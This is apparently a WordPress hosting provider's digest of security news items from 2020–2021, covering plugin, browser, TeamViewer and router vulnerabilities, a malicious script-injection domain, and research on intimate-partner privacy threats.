Critical 0-day in The Plus Addons for Elementor Allows Site Takeover

Today, March 8, 2021, the Wordfence Threat Intelligence team became aware of a critical 0-day in The Plus Addons for Elementor, a premium plugin that we estimate has over 30,000 installations. This vulnerability was reported this morning to WPScan by Seravo, a hosting company. The flaw makes it possible for attackers to create new administrative user accounts on vulnerable sites, if user registration is enabled, along with logging in as other administrative users.

The Plus Addons for Elementor Lite, the free version by the same developer, does not appear to be vulnerable to this exploit.

None of the sites currently under management by ProtectYourWP.com are affected by this bug.

Full details: https://www.wordfence.com/blog/2021/03/critical-0-day-in-the-plus-addons-for-elementor-allows-site-takeover

False Positive Vulnerability Report on Events Manager

The popular calendar plugin Events Manager was reported as containing a Cross-Site Scripting vulnerability, which turned out to be a false positive (no such vulnerability). Several vulnerability reporting sites are still listing it as vulnerable, and if you have it installed you may have been notified.

However, it is not an actual problem and you can safely continue using version 5.9.8.1 or later.

Google Chrome Bug Could Let Hackers Bypass CSP Protection; Update Web Browsers

If you haven’t recently updated your Chrome, Opera, or Edge web browser to the latest available version, it would be an excellent idea to do so as quickly as possible.

Cybersecurity researchers on Monday disclosed details about a zero-day flaw in Chromium-based web browsers for Windows, Mac and Android that could have allowed attackers to entirely bypass Content Security Policy (CSP) rules since Chrome 73.

Full article: https://thehackernews.com/2020/08/chrome-csp-bypass.html

Microsoft Defender can ironically be used to download malware

A recent update to Windows 10’s Microsoft Defender antivirus solution ironically allows it to download malware and other files to a Windows computer.

In a recent Microsoft Defender update, the command-line MpCmdRun.exe tool has been updated to include the ability to download files from a remote location, which could be abused by attackers.

With this new feature, Microsoft Defender is now part of the long list of Windows programs that can be abused by local attackers.

Full story at https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/

TeamViewer fixes bug that lets attackers access your PC

Popular remote access and troubleshooting app, TeamViewer has patched a vulnerability that could let attackers quietly establish a connection to your computer and further exploit the system.

When successfully exploited, this bug would let an unauthenticated, remote actor execute code on your Windows PC, or obtain password hashes (e.g., for cracking via brute-force).

Full article: https://www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/

New Virus from the domain “ js.donatelloflowfirstly[.]ga “ is infecting many WordPress sites

This is an advertising injection/redirection javascript which sends your visitors off to malicious domains. The javascript in question is injected into EVERY post on affected sites.

Our clients should be automatically protected against most javascript injections such as this (but let us know if you see something like this on your site!).

A quick search for “donatelloflowfirstly” will bring up a bunch of sites which are affected – and a few with instructions on how to clean up the mess.

Work From Home Alert: Critical Bug Found in Old D-Link Router Models

Researchers find six bugs in consumer D-Link DIR-865L Wireless AC 1750 Dual Band Cloud Router.

D-Link is urging customers to replace its now obsolete line of DIR-865L Wireless Routers in reaction to a recently discovered critical command-injection bug that leaves users open to a denial-of-service attack.

The routers, first introduced in 2013, reached end-of-life support in Feb. 2016. In Aug. 2018, D-Link released a patch (1.20B01 beta) to address multiple security bugs. On Friday, Palo Alto Networks’ Unit 42 researchers publicly disclosed six additional bugs – one rated critical and five rated high severity.

“The vulnerabilities were found in the DIR-865L model of D-Link routers, which are meant for home network use,” researchers wrote. “The current trend towards working from home increases the likelihood of malicious attacks against home networks, which makes it even more imperative to keeping our networking devices updated.”

Full article: https://threatpost.com/work-from-home-alert-critical-d-link-bug/156573/

When Your Biggest Security and Privacy Threats Come From the Ones You Love

Research examines the risks and design challenges of accounting for privacy threats in intimate relationships.

As technology has become more ubiquitous in people’s everyday lives, a new class of privacy threats has emerged in family, romantic, friendship, and caregiving relationships. Dubbed “intimate threats” by a recent academic paper in the Journal of Cybersecurity, these are the thorny risks that are intertwined with issues around location tracking, always-on monitoring or recording, online surveillance, and the control over technology accounts or devices.

Written by Karen Levy, a lawyer and sociologist, and information security luminary Bruce Schneier, the paper examines how the dynamics of different intimate relationships break the security model in a lot of systems. It examines real-world examples of this in action and also provides some recommendations for technology designers and security professionals to start rethinking how they build products and think about threat models and security use cases.

The use of technology in intimate relationships can quickly turn dark with very little recourse from the victim because the product was never designed to account for abuse cases.

“Facebook had a system for a while where you’d get your account back because they’d show you pictures and you’d click on the ones that are your friends, assuming that you know who they are but other people don’t,” Schneier says. “But your partner and your parents all know that stuff too. So it’s a great system, but it fails in the intimate context. It fails when your boyfriend takes over your account.”

 

Full article at https://www.darkreading.com/risk/when-your-biggest-security-and-privacy-threats-come-from-the-ones-you-love/d/d-id/1338053

Vulnerability Disclosures Drop in Q1 for First Time in a Decade

And now for some good news:

Even with more security issues published on Patch Tuesdays, the total number of software flaws dropped for the first three months of 2020, according to one tally.

The number of vulnerabilities reported publicly dropped in the first quarter of 2020 for the first time in at least a decade, falling nearly 20% to 4,968 compared with the same quarter last year, according to an analysis published on Thursday by Risk Based Security.

Full story at https://www.darkreading.com